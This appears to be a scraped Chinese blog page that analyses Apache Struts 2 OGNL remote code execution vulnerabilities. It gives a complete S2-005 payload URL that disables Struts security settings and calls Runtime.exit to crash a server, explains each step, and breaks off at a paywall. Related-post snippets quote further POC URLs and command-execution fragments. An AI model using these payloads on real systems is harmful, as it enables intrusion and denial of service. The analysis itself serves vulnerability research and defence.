Struts漏洞分析与研究

最新推荐文章于 2024-07-16 08:37:37 发布
最新推荐文章于 2024-07-16 08:37:37 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: WEB安全 文章标签: struts 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/calmegm/article/details/49105389
版权
本文详细分析了Apache Struts框架中多个版本存在的代码执行漏洞,包括S2-003、S2-005、S2-007、S2-008、S2-009等,解释了漏洞产生的原因和攻击者如何利用这些漏洞执行恶意代码。通过Payload示例,展示了如何绕过安全配置,执行静态方法和系统命令。
摘要由CSDN通过智能技术生成

1. Apache官方公告

http://struts.apache.org/development/2.x/docs/security-bulletins.html

其中涉及代码执行的漏洞有:S2-003,S2-005,S2-007,S2-008,S2-009,S2-012~S2-016,S2-20~21下面逐一简要说明。

2. 各版本漏洞分析

S2-003

受影响版本:Struts 2.0.0 - Struts 2.0.11.2
概述
struts2会将http的每个参数名解析为ongl语句执行(可理解为java代码)。ongl表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制。

S2-005

受影响版本:Struts2.0.0 - Struts 2.1.8.1
概述
对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,安全配置被绕过再次导致了漏洞。

Payload详解

http://www.xxxx.com/aaa.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
提交上述URL,就会导致服务器down掉。把编码转换过来为下面三个步骤:

1) ?('#_memberAccess['allowStaticMethodAccess']')(meh)=true

将_memberAccess变量中的allowStaticMethod设置为true,这里payload还要加括号,并且还带个"(meh)"呢?其实是为了遵守Ognl语法树的规则,这个后面再说。第一步完成后,就可以执行静态方法了。

2) &(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))
将上下文中的 xwork.MethodAccessor.denyMethodExecution 设置为false,即允许方法的执行,这里的MehodAccessor是Struts2中规定方法/属性访问策略的类,也存在与Ognl的上下文中。同样遵守Ognl语法树规则。
3) & (asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtim e@getRuntime()))=1
最低0.47元/天 解锁文章
6um1n
关注
专栏目录
Struts2漏洞
lin062854的专栏
11-03 3367
Struts 2.3.15版本被曝出存在重要的安全漏洞,主要问题如下   1、可远程执行服务器脚本代码          用户可以构造http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','her
Struts2漏洞分析漏洞波及全系版本
445822357
10-31 536
Struts漏洞分析 Apache Struts团队已经发布了Struts 2.3.15.1安全更新版本。在Struts2.3.15.1版本之前,存在着严重的安全漏洞,如果现在一些比较大的网站是用JAVA做的,没有把版本升级,还用的是Strtus2.3.15.1版本之前的话,那么你们就要小心,服务器被黑了哦。 下面就来说一下之前版本,Struts2的漏洞是如何产生的,我们自己去做,该如何的...
Struts2漏洞分析
z69183787的专栏
09-03 2745
当在浏览器输入如下地址时:        http://www.xxxx.com/aaa.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')
struts-s2-009 代码执行 (CVE-2011-3923)
最新发布
qq_23003811的博客
07-16 206
这个漏洞跟s2-003 s2-005 属于一套的。Struts2对s2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;于是Struts2对s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。example=&(example)('xxx')=1的方法来执行它,从而绕过官方对#、\等特殊字符的防护。通过修改whoami位置达到任意命令执行。
重现apache commons fileupload DOS漏洞
sunxing007的专栏
05-15 4383
这个漏洞是2014年2月4日被发现的, 因为该组件试用范围非常广, 所以该漏洞的影响也非常巨大。通过特制的包含畸形header的http请求,可以导致使用该组件的应用程序进入无线循环从而耗尽CPU等资源并最终崩溃。 最近因为在修补struts1的可操纵classLoader漏洞(struts2也有该漏洞, 不在本文讨论范围), 所以我就在我建立的struts1的项目上直接做测试。 怎么创建
S2-009 远程代码执行漏洞
玄道的网安博客
06-28 524
影响版本 2.1.0 - 2.3.1.1 环境搭建 cd vulhub/struts2/s2-009 docker-compose build && docker-compose up -d 访问http://your-ip:8080/ajax/example5.action http://yourIP:8080/ajax/example5.action 漏洞复现 http://yourIP:8080/ajax/example5.action?age=12313&amp
Struts2远程命令执行漏洞分析及防范
dongsheng186的专栏
04-10 703
    Struts 2是在struts 和WebWork的技术基础上进行了合并的全新的框架。其全新的Struts 2的体系结构与Struts 1的体系结构的差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控制器能够与Servlet API完全脱离开,所以Struts 2可以理解为WebWork的更新产品.   近期Stru
Struts2漏洞分析研究之Ognl机制探讨1
08-08
通过深入理解OGNL的工作原理,开发者可以更好地利用Struts2框架进行数据操作,同时也能更好地识别和防止Struts2框架中可能出现的安全漏洞,比如通过OGNL表达式注入攻击。在实际应用中,确保对OGNL表达式的正确过滤和...
Struts2漏洞利用工具2019版 V2.3.zip
09-11
"Struts2漏洞利用工具2019版 V2.3.zip" 是一个针对这些安全漏洞的检测和利用工具,用于帮助安全研究人员和系统管理员识别和修复Struts2框架的安全问题。 首先,Struts2框架的最著名的漏洞之一是S2-045,这是一个...
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
K8 Struts2 Exp 20160516(Struts2综合漏洞利用工具)
01-07
这个工具主要是针对上述漏洞进行利用的,通过自动化的方式帮助安全研究人员或者攻击者快速检测并利用Struts2框架中的漏洞。其主要功能可能包括: 1. **漏洞探测**:扫描目标服务器,识别是否存在Struts2的特定版本...
java 2mi远程执行漏洞_Struts2 5个远程代码执行漏洞利用POC
weixin_28822657的博客
02-27 877
标 题: Struts2 5个远程代码执行漏洞利用POC作 者: 园长链 接: http://my.oschina.net/backtract/blog/133638利用代码: 检测是否存在:POC1:http://127.0.0.1/Struts2/test.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)((...
struts2远程执行漏洞学习(三)
ice
02-24 212
        这个是终结部分了。     除了#_memberAccess.allowStaticMethodAccess'是一个关键属性外,'xwork.MethodAccessor.denyMethodExecution’是另一个关键属性,意义如同名字,这个属性决定了是否可以执行方法,只有当这个属性为false时,我们才可以利用ognl自定义变量,调用一些关键的方法 例如FileWrite...
墨者学院-Apache Struts2远程代码执行漏洞(S2-013)复现
JimWu的博客
09-04 1864
Apache Struts2远程代码执行漏洞(S2-013)复现 难易程度:★ 题目类型:命令执行 使用工具:FireFox浏览器、burpsuite 漏洞原理: s:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL...
墨者题解_内部文件上传系统漏洞分析溯源
weixin_43072923的博客
04-08 403
墨者学院——内部文件上传系统漏洞分析溯源 根据背景: 我们可以尝试该页面做了什么防护: 首先尝试输入php或者asp文件,发现不行: 再次尝试txt、jpg等文件,发现可以上传: 通过F12查看其服务,为IIS/6.0: 上百度搜索IIS的漏洞,知道了当我们上传xxx.asp文件时,该文件以后的子文件都以asp文件来执行,例如ccooll.asp后面有子文件ccooll.jpg,则/ccooll.asp/ccooll.jpg以asp文件执行。 接下来,我们便开始getshel.
struts2 的几个远程代码执行漏洞
zwjhuhu的专栏
06-28 2025
主要收集自网络 http://zone.wooyun.org/content/3880 来源: http://ahack.iteye.com/blog/1858871 http://ahack.iteye.com/blog/1873005 检测是否存在: 可能使用的代码 POC1: http://127.0.0.1/Struts2/test.action?('\43
Struts2_005_RCE CVE-2010-1870漏洞复现
ADummy的博客
02-18 2280
Struts2_005_远程代码执行 by ADummy 0x00利用路线 ​ 直接url执行payload,由于浏览器url输入框的长度有限,可以使用Hackbar插件,或burpsuite抓包测试。无回显。 0x01漏洞介绍 ​ S2-005是由于官方在修补S2-003不全面导致绕过补丁造成的。我们都知道访问Ognl的上下文对象必须要使用#符号,S2-003对#号进行过滤,但是没有考虑到unicode编码情况,导致\u0023或者8进制\43绕过。S2-005则是绕过官方的安全配置(禁止静态方法
【Python】STR2漏洞综合扫描+源码分析
浪子燕青的博客
01-18 2718
花了半天写完的~~ 还不错~~ 现在同目录下创建url.txt  将收集到的url放进去  就ok~~ 最后成功的会在同目录下生产success.txt~~ 附上源码~~~ # -*-coding:utf-8-*- import requests import time print unicode(''' 作者:浪子燕青 作者QQ:982722261
Struts2重大漏洞CVE-2017-5638:远程代码执行风险
漏洞分析深入到了Struts2的filter机制,特别是对文件类型表单的处理过程。当用户提交含有文件的表单时,系统会自动将request对象增强为MultiPartRequestWrapper,这个过程中涉及到对请求内容的解析。然而,当上传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值